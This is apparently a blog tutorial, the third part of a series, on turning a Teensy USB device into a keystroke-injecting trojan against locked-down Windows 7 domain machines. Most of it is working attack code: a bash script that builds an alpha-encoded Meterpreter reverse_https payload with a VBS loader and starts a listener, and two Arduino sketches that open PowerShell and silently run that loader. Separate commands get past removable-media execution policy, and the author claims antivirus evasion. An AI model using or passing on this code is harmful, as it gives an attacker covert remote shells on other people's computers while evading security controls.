Teensy++2.0 Metasploit Part 3

One line to rule them all, one line to find them, one line to bring them all and in the darkness bind them .

Okay so this is my final shot on trojanized usb teensy device to make it as invisible as possible to the user eye on the attacking system (Windows 7 in this example)  The Windows 7 environment has classic Domain restrictions like disabled cmd.exe , disabled Win+R, Antivirus software etc.

I will show two scenarios here one of them being: Windows 7 with “Run” enabled in Start menu and other without “Run” and only with search. Both of these scenarios take into account a fact that powershell.exe is permitted on the system and the Domain admins did not disable it.

Here is my Meterpreter script to handle all the encoding etc. As usual please put it to your Metasploit root folder, make it executable, change the tun0 network interface to your needs inside the script and change the path to your arduino trojaned-usbdrive project folder.

This works with Metasploit-current svn sources up to rev 13385,  later versions are somewhat broken so please stick to this one or svn up -r 13385 for now 

Works now as of Metasploit 4.0 release svn r13473 

#!/bin/bash
echo "************************************************************"
echo "           Automatic shellcode generator                    "
echo "                                                            "
echo "************************************************************"
echo -e "What Port Number are we gonna listen to? : \c"
read port
# Get OS name
OS=`uname`
IO="" # store IP
case $OS in
   Linux) IP=`ifconfig tun0  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
   FreeBSD|OpenBSD) IP=`ifconfig  tun0 | grep -E 'inet.[0-9]' | grep -v '127.0.0.1' | awk '{ print $2}'` ;;
   SunOS) IP=`ifconfig -a | grep inet | grep -v '127.0.0.1' | awk '{ print $2} '` ;;
   *) IP="Unknown";;
esac
#echo "$IP"
./msfpayload windows/meterpreter/reverse_https LHOST=$IP LPORT=$port EXITFUNC=process R | ./msfencode -e x86/alpha_mixed -t raw BufferRegister=EAX > alphacode 

if [ ! -d "$ShellCode" ]; then
mkdir ShellCode
fi
mv alphacode ShellCode
#creating the vbs loader
echo 'Set oShell = CreateObject("Wscript.shell") ' > ShellCode/exec.vbs
echo 'sPath=Wscript.ScriptFullName' >> ShellCode/exec.vbs
echo 'x=InstrRev(sPath, "\")' >> ShellCode/exec.vbs
echo 'sPath=Left(sPath,x)' >> ShellCode/exec.vbs
echo -e 'sCmd = sPath+"a.exe \c' >> ShellCode/exec.vbs
cat ShellCode/alphacode >> ShellCode/exec.vbs
echo '"' >> ShellCode/exec.vbs
echo ' oShell.Run sCmd,0,False' >> ShellCode/exec.vbs
todos ShellCode/exec.vbs
mv ShellCode/exec.vbs /home/knoppix/arduino-0022/trojaned_usbdrive/disk 

./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_https LHOST=$IP LPORT=$port AutoRunScript='migrate explorer.exe'  E

So what happens here is our usual stuff, generating the encoded Alpha-mixed payload, putting it into the ShellCode directory and generating the vbs script and moving it to the trojaned-usbdrive project folder for teensy deployment. We must not forget about the ShellcodeExec  binary which I’ve renamed simply to a.exe and placed it in the disk folder witin the trojaned-usbdrive project folder.

First scenario with RUN enabled is the stealthiest and a true One-Liner

#include <phukdlib.h>
void setup() {
  }

void loop () {
  delay(9000);
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_ESC);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(1000);
  Keyboard.print("powershell -Command");
  Keyboard.set_key1(KEY_SPACE);
  Keyboard.send_now();
  Keyboard.set_modifier(MODIFIERKEY_SHIFT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_QUOTE);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  Keyboard.print("$disk = wmic logicaldisk list brief | select-string -pattern tinydisk | out-string");
  Keyboard.set_modifier(MODIFIERKEY_SHIFT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_QUOTE);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_SEMICOLON);
  Keyboard.send_now();
  Keyboard.print("$drive = $disk.substring(2,2)");
  Keyboard.set_key1(KEY_SEMICOLON);
  Keyboard.send_now();
  Keyboard.print("invoke-expression $drive");
  Keyboard.set_key1 (KEY_BACKSLASH);
  Keyboard.send_now();
  Keyboard.print("exec.vbs");
  PressAndRelease(KEY_ENTER,1);
  delay(2000);
  Keyboard.print("exit");
  PressAndRelease(KEY_ENTER,1);
  delay(9000000);
}

What happens here is simple: Open Start menu (CTRL+ESC)  and paste the following code into run field :

powershell -Command "$disk = wmic logicaldisk list brief | select-string -pattern tinydisk | out-string" ; $drive = $disk.substring(2,2); invoke-expression $drive\exec.vbs

In case the Local Group Policy is set to disable execute on removable mass storage we can do this instead ;) 
powershell -Command "$disk = wmic logicaldisk list brief | select-string -pattern tinydisk  | out-string" ; $drive = $disk.substring(2,2); copy $drive\* $env:temp ;invoke-expression $env:temp\exec.vbs

Its quick and silent and bypasses almost all antivirus software.

Second scenario is the restricted environment where we dont have the RUN option in Start menu

We can search but we cant run ;) so we search for powershell and let it run our script in one line and quickly close so it does not raise any suspicion.

nclude <phukdlib.h>
void setup() {
  }
void loop () {
  delay(9000);
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_ESC);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(400);
  Keyboard.print("powershell ");
  PressAndRelease(KEY_ENTER,1);
  delay(2000);
  Keyboard.print("$disk = wmic logicaldisk list brief | select-string -pattern tinydisk | out-string");
  Keyboard.set_key1(KEY_SEMICOLON);
  Keyboard.send_now();
  Keyboard.print("$drive = $disk.substring(2,2)");
  Keyboard.set_key1(KEY_SEMICOLON);
  Keyboard.send_now();
  Keyboard.print("invoke-expression $drive");
  Keyboard.set_key1 (KEY_BACKSLASH);
  Keyboard.send_now();
  Keyboard.print("exec.vbs");
  PressAndRelease(KEY_ENTER,1);
  delay(2000);
  Keyboard.print("exit");
  PressAndRelease(KEY_ENTER,1);
  delay(9000000);
}

What happens here is simple: CTRL+ESC open Start menu, search for powershell and execute it and run the following script:

$disk = wmic logicaldisk list brief | select-string -pattern tinydisk | out-string ; $drive = $disk.substring(2,2); invoke-expression $drive\exec.vbs

Its less silent as we have the powershell window on for a while but its still pretty good for what it does.

Please keep in mind that the exec.vbs gets created by the first shell script which needs to be in the Metasploit root folder also you might need the todos installed to convert the final exec.vbs script file to dos format.

Well this is all what I could come up with on this subject, I hope you enjoy your shells !

Micro Credo:
Never trust a computer bigger than you can lift.

Advertisements
Gallery | This entry was posted in Uncategorized. Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s